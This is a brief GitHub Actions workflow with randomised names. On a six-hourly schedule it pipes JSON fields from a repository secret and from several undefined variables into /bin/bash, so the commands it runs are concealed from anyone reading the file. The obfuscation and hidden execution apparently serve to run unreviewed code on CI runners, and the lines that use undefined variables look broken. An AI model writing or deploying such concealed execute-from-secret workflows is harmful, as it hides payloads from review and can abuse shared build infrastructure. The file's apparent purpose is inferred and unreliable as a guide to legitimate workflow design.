name: liqingai6372

on:
  workflow_dispatch:
  schedule:
    - cron: '49 4/6 * * *'
jobs:  # 186
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liqingai6372
        env:
          ywxhr10313: ${{ secrets.ywxhr10313 }}
        run: |
          echo $ywxhr10313 | jq -r .jfvir12 | /bin/bash
          echo $vadc8 | jq -r .nva5199 | /bin/bash
          echo $nf2 | jq -r .hsnvq50 | /bin/bash
          echo $uo8287 | jq -r .uppi98 | /bin/bash

